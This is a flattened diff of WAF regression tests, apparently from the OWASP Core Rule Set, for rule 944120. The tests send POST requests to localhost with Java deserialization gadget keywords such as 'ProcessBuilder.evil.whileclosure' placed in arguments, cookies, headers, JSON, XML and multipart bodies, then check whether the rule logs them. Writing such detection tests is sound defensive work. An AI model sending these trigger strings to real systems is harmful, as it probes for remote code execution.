"multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-103 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + 
log_contains: "id \"944120\"" + - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: 
"id \"944120\"" + - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 110 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" 
- port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-117 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - 
{"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-118 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-119 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 119 desc: "Content-Type 
multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-120 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
ProcessBuilder.evil.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" 
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-128 + - input: + dest_addr: 
